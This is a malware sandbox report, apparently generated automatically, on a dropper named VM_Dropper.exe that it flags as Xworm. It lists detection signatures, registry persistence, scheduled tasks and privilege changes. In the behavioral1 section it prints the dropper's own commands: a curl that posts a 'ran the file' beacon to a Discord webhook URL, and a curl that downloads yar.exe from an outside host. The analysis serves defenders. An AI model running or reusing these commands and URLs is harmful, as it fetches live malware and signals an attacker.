Analysis Overview
SHA256
de9ea4b92ab39c4ff711fb80136eb53553d8932620a1794e41354bb5fb4060bc
Threat Level: Known bad
The file VM_Dropper.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-30 03:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 03:02
Reported
2024-05-30 03:07
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1500 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
Network
Files
memory/1500-0-0x000000007440E000-0x000000007440F000-memory.dmp
memory/1500-1-0x0000000001070000-0x0000000001096000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-30 03:02
Reported
2024-05-30 03:08
Platform
win10v2004-20240226-en
Max time kernel
126s
Max time network
309s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5328 created 3296 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\taskmgr.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3068 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5232 created 3296 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\taskmgr.exe |
Xworm
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\yar.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\penisware.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\calc.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\calc.exe | N/A |
| N/A | N/A | C:\Users\Admin\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\calc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\penisware.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svvhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\penisware.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yar = "C:\\Users\\Admin\\AppData\\Roaming\\yar.exe" | C:\Users\Admin\yar.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penisware = "C:\\Users\\Admin\\AppData\\Local\\penisware.exe" | C:\Users\Admin\penisware.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svvhost = "C:\\Users\\Admin\\AppData\\Roaming\\svvhost.exe" | C:\Users\Admin\calc.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe | C:\Users\Admin\penisware.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\sachost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe | C:\Users\Admin\calc.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe | C:\Users\Admin\yar.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3068 set thread context of 3012 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\yar.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\calc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\penisware.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\yar.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\calc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\penisware.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\sachost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisballs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\physics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\sachost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\physics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisballs.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\yar.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\penisware.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\calc.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: 31 | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
